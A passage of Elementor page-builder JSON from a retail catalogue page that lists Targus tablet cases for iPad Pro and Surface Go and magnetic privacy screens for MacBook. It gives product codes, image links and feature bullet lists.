center;\\\">(THZ74413GL)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"e19a656\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d135e68\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>Pro-Tek <\\/strong><strong>11-inch\\u00a0 <\\/strong><strong>iPad<\\/strong><strong>\\u00ae <\\/strong><strong>Pro<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(THZ73803GL)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c5f1a3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"94b3c2d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>VersaVu Signature <\\/strong><strong>11-inch <\\/strong><strong>iPad<\\/strong><strong>\\u00ae <\\/strong><strong>Pro<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(THZ74502GL)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cc6acc0\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"9268480\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0e368ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0011\\/9229\\/6515\\/products\\/0050396_versavu-classic-case-for-11-in-ipad-pro-burgundy_grande.jpg?v=1571711590\\\" alt=\\\"VersaVu\\u00ae Classic Case for iPad Pro (11-inch) - Burgundy\\\" width=\\\"190\\\" height=\\\"190\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"039f013\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d9e6d7a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0011\\/9229\\/6515\\/products\\/0050315_pro-tek-rotating-case-for-11-in-ipad-pro-black_grande.jpg?v=1571711589\\\" alt=\\\"Pro-Tek\\u2122 Rotating Case for iPad Pro (11-inch) - Black\\\" width=\\\"192\\\" height=\\\"192\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"77e1d15\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e079a49\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0011\\/9229\\/6515\\/products\\/0050385_versavu-classic-case-for-129-in-ipad-pro-2018-black_grande.jpg?v=1571711590\\\" alt=\\\"VersaVu\\u00ae Classic Case for iPad Pro\\u00ae (12.9-inch) 3rd gen. - Black\\\" width=\\\"192\\\" height=\\\"194\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8b54b12\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"8672d06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0d70140\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>Available Color Black &amp; Gold<\\/li><li>Passes military grade 4\\u2019 drop testing for robust protection<\\/li><li>Adjusts in an instant to deliver virtually infinite viewing angles and comfortable typing position<\\/li><li>Patented custom-moulded tray with reinforced corners enhances impact protection<\\/li><li>Precision cut access to controls, ports and camera lenses<\\/li><li>Boosts sound with audio-scoops that direct sound toward user<\\/li><li>Magnetic closure ensures secure transport<\\/li><li>Integrated Apple Pencil\\u00ae\\/stylus holder<\\/li><li>Limited lifetime warranty<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c2ce129\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8a2e1c8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul id=\\\"product-features\\\"><li>Available Color Black &amp; Blue<\\/li><li>Passes military grade 4\\u2019 drop testing for robust protection<\\/li><li>Geometric Pro-Tek design delivers practical protection with adaptable good looks<\\/li><li>Patented custom-moulded tray with reinforced corners enhances impact protection<\\/li><li>Patented 360\\u00b0 rotation for portrait\\/landscape viewing<\\/li><li>Precision cut access to controls, ports and camera lenses<\\/li><li>Boosts sound with audio-scoops that direct sound toward user<\\/li><li>Magnetic wrap closure ensures secure transport<\\/li><li>Integrated Apple Pencil\\u00ae\\/stylus holder<\\/li><li>Limited lifetime warranty<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a76315d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"c26b89d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul id=\\\"product-features\\\"><li>Available Color Black\\/Charcoal &amp; Blue<\\/li><li>Passes military grade 4\\u2019 drop testing for robust protection<\\/li><li>Patented 360\\u00b0 rotation for quick-switch portrait\\/landscape viewing<\\/li><li>Adjusts in an instant to deliver virtually infinite viewing angles and comfortable typing position<\\/li><li>Boosts sound with audio-scoops that direct sound toward user<\\/li><li>Secure, metallic snap-close mechanism delivers quick access and striking style<\\/li><li>Premium faux leather hand strap<\\/li><li>Integrated Apple Pencil\\u00ae\\/stylus holder<\\/li><li>Limited lifetime warranty<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a780230\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"8102767\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e736638\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"e712cb0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9336132\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"3b49729\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f3df92b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b6c073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"b7d1d39\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"e683a6d\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f005697\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"3c683c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6cfc8d4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>VersaVu <\\/strong><strong>11-inch<\\/strong><strong> iPad<\\/strong><strong>\\u00ae <\\/strong><strong>Pro<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(THZ74413GL)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"e8d2137\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1467ed2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>Pro-Tek\\u2122 <\\/strong><strong>Rotating Case <\\/strong><strong>12.9-inch iPad\\u00ae Pro<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(THZ748GL)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"44f9857\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e380076\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>VersaVu\\u00ae Classic Case for <\\/strong><strong>12.9-inch <\\/strong><strong>iPad\\u00ae Pro<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(THZ749GL)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2c30185\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"4ec1175\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"23ccf88\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0011\\/9229\\/6515\\/products\\/0050396_versavu-classic-case-for-11-in-ipad-pro-burgundy_grande.jpg?v=1571711590\\\" alt=\\\"VersaVu\\u00ae Classic Case for iPad Pro (11-inch) - Burgundy\\\" width=\\\"195\\\" height=\\\"195\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"3c06e0a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"30b6c65\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0011\\/9229\\/6515\\/products\\/0050315_pro-tek-rotating-case-for-11-in-ipad-pro-black_grande.jpg?v=1571711589\\\" alt=\\\"Pro-Tek\\u2122 Rotating Case for iPad Pro (11-inch) - Black\\\" width=\\\"192\\\" height=\\\"192\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"16573a3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"44ec04c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0011\\/9229\\/6515\\/products\\/0050385_versavu-classic-case-for-129-in-ipad-pro-2018-black_grande.jpg?v=1571711590\\\" alt=\\\"VersaVu\\u00ae Classic Case for iPad Pro\\u00ae (12.9-inch) 3rd gen. - Black\\\" width=\\\"196\\\" height=\\\"196\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"907f6a3\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"6718b07\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cc7a527\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>Available Color Black, Red &amp; Burgundy<\\/li><li>Passes military grade 4\\u2019 drop testing for robust protection<\\/li><li>Patented 360\\u00b0 rotation for quick-switch portrait\\/landscape viewing<\\/li><li>Patented custom-moulded tray with reinforced corners enhances impact protection<\\/li><li>Precision control, port and camera cut-outs deliver hassle-free listening and photos<\\/li><li>Boosts sound with audio-scoops that direct sound toward user<\\/li><li>Magnetic wrap closure ensures secure transport<\\/li><li>Integrated Apple Pencil\\u00ae\\/stylus holder<\\/li><li>Limited lifetime warranty<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6601d39\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"27e4cb1\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>Available Color Black<\\/li><li>Passes military grade 4\\u2019 drop testing<\\/li><li>Geometric Pro-Tek\\u2122 design delivers practical protection and enhances stability<\\/li><li>Patented custom-molded tray with reinforced corners guard against impact<\\/li><li>Patented 360\\u00b0 rotation for quick-switch portrait\\/landscape viewing<\\/li><li>Adjusts in an instant to deliver virtually infinite viewing angles and comfortable typing<\\/li><li>Precision control, port, and camera cutouts deliver hassle-free listening and photos<\\/li><li>Boosts sound with audio scoops that direct sound toward user<\\/li><li>Magnetic wrap closure ensures secure transport<\\/li><li>Integrated Apple Pencil\\u00ae\\/stylus holder<\\/li><li>Limited lifetime warranty<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"780ec47\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cb1d3b2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul id=\\\"product-features\\\"><li>Available Color Black<\\/li><li>Passes military grade 4\\u2019 drop testing* for robust protection<\\/li><li>Patented 360\\u00b0 rotation for quick-switch portrait\\/landscape viewing<\\/li><li>Patented custom-moulded tray with reinforced corners enhances impact protection<\\/li><li>Adjusts in an instant to deliver virtually infinite viewing angles and comfortable typing position<\\/li><li>Precision control, port and camera cut-outs deliver hassle-free listening and photos<\\/li><li>Boosts sound with audio-scoops that direct sound toward user<\\/li><li>Magnetic wrap closure ensures secure transport<\\/li><li>Integrated Apple Pencil\\u00ae\\/stylus holder<\\/li><li>Limited lifetime warranty<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e704695\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"39b318b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"df3be40\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ba13e6b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe249f3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"278724c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"027329b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"054db58\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c6196c1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"39f71bf\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"208ace1\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"dd3ee9d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"26b4f3b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>VersaVu Signature <\\/strong><strong>12.9-inch\\u00a0<\\/strong><strong> iPad<\\/strong><strong>\\u00ae <\\/strong><strong>Pro<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(THZ750GL)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"4a121f6\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"674bee1\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>SafePort Rugged <\\/strong><strong>Case for <\\/strong><strong>12.9-inch iPad <\\/strong><strong>(6th gen. \\/ 5th gen.)<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(THD138GLZ)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2bed517\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"aae738f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"f6a9f2e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0011\\/9229\\/6515\\/products\\/0050377_versavu-signature-series-case-for-129-in-ipad-pro-2018-black_grande.jpg?v=1571711590\\\" alt=\\\"VersaVu\\u00ae Signature Series Case for iPad Pro\\u00ae (12.9-inch) 3rd gen. - Black\\\" width=\\\"190\\\" height=\\\"190\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a7759bf\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"c62f212\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0011\\/9229\\/6515\\/products\\/3_THD138GLZ_BACK2_1024x1024.jpg?v=1571711592\\\" width=\\\"189\\\" height=\\\"189\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2cb966a\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"ba550a9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"6da4bbf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>Available Color Black<\\/li><li>Passes military grade 4\\u2019 drop testing* for robust protection<\\/li><li>Premium fabric\\/faux leather exterior with metallic accents delivers standout style<\\/li><li>Patented 360\\u00b0 rotation for quick-switch portrait\\/landscape viewing<\\/li><li>Adjusts in an instant to deliver virtually infinite viewing angles and comfortable typing position<\\/li><li>Boosts sound with audio-scoops that direct sound toward user<\\/li><li>Secure, metallic snap-close mechanism delivers quick access and striking style<\\/li><li>Premium faux leather hand strap<\\/li><li>Integrated Apple Pencil\\u00ae\\/stylus holder<\\/li><li>Limited lifetime warranty<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"4bdd233\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"6c9e329\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>Available Color Black<\\/li><li>Heavy duty, shock-absorbing case for the iPad (6th gen. \\/ 5th gen.), iPad Pro (9.7-inch)<\\/li><li>Form-fit TPU shell with USA Military-Spec drop protection \\u2013 protects your device from 1.2m\\/4ft drops<\\/li><li>Offers rugged protection in a slim, professional-looking case<\\/li><li>Sound enhancing scoops for all iPad speakers<\\/li><li>Integrated stand for stable viewing and comfortable typing<\\/li><li>Optional detachable shoulder strap (THA101GLZ)<\\/li><li>Compatible with the ambient light sensor and mic on your device<\\/li><li>Clear window on back to display asset tag<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6b71a0e\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"26da7ba\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"7094b67\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c542f72\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"d3243ec\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d729ea6\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"60d35e1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"84813a6\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"46d1844\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"5da049f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"7ac39cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>Protect Case for Microsoft Surface\\u2122 Go<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(THZ779GL)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f231dba\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"db2432a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>Protect Case for Microsoft Surface\\u2122 Go<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(THD491GLZ)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a8dc8da\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"1953aa2\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"ac8efa3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0011\\/9229\\/6515\\/products\\/THZ779GL_11_PEN2_1024x1024.jpg?v=1571711592\\\" width=\\\"193\\\" height=\\\"193\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"398b7f1\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"2b1f7b7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0011\\/9229\\/6515\\/products\\/THD491GL_20_USE4_1024x1024.jpg?v=1571711592\\\" width=\\\"192\\\" height=\\\"192\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b76d24\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"84599d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"b02e1d8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>Available Color Black<\\/li><li>Case passes military grade 4\\u2019 drop testing (MIL-STD 810G)*<\\/li><li>Hard-moulded tray with durable kickstand<\\/li><li>Advanced corner protection with shock-absorbent TPU<\\/li><li>Non-slip interior for infinite viewing angles<\\/li><li>Integrated Surface Pen holder (pen not included)<\\/li><li>Compatible with Surface Type Cover<\\/li><li>Compatible with Surface Dock<\\/li><li>Full access to camera and ports<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"56f840c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"829e6ec\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>Available Color Black<\\/li><li>Case passes military grade 4\\u2019 drop testing (MIL-STD 810G)*<\\/li><li>Hard-moulded tray with durable kickstand<\\/li><li>Advanced corner protection with shock-absorbent TPU<\\/li><li>Keyboard locking feature helps prevent accidental disconnects (keyboard not included)<\\/li><li>Detachable hand strap (included) and integrated Surface Pen holder (pen not included)<\\/li><li>Compatible with Surface Type Cover<\\/li><li>Compatible with Surface Dock<\\/li><li>Full access to camera and ports<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a6b2856\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"33e8d3f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"d4063c8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c2ef704\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"61e6c6e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"da0626d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"a354cbe\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"8006a3f\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2cda527\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"12faef0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3eb43c0\",\"elType\":\"widget\",\"settings\":{\"title\":\"Privacy Screen\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#0c0c0c\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6314953\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"78877de\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"468758b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>Apple Macbook<\\/strong><\\/h3>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b6689d9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\"},\"elements\":[{\"id\":\"1e7d8da\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\"},\"elements\":[{\"id\":\"6e8f169\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0011\\/9229\\/6515\\/products\\/0049031_magnetic-privacy-screen-for-133-macbook-2017_ebc5f6e1-9646-4840-9ef4-6441c94ae069_grande.jpg?v=1571711592\\\" alt=\\\"Magnetic Privacy Screen for 13.3\\\" width=\\\"274\\\" height=\\\"274\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"61fa17e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"7efc979\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\"><strong>Magnetic Privacy Screen for Apple MacBook<\\/strong><\\/h2><ul id=\\\"product-features\\\"><li>Protect your on-screen data, Privacy Screens block angled viewing from prying eyes<\\/li><li>Magnetic screens easy to attach, remove and reattach. No tools, no adhesives, no installation required<\\/li><li>Blue light filter: Targus Privacy Screens reduce blue light for better protection and reading comfort<\\/li><li>Available\\u00a0 for :-<\\/li><\\/ul><ol><li style=\\\"list-style-type: none;\\\"><ol><li><h4>MacBook 12-inch (ASM12MBGL)<\\/h4><\\/li><li><h4>MacBook 13.3-inch (ASM133MBP6GL)<\\/h4><\\/li><li><h4>MacBook Air 13.3-inch (ASM133MBA7GL)<\\/h4><\\/li><li><h4>MacBook 15.4-inch (ASM154MBGL)<\\/h4><\\/li><li><h4>MacBook Pro 15.4-inch 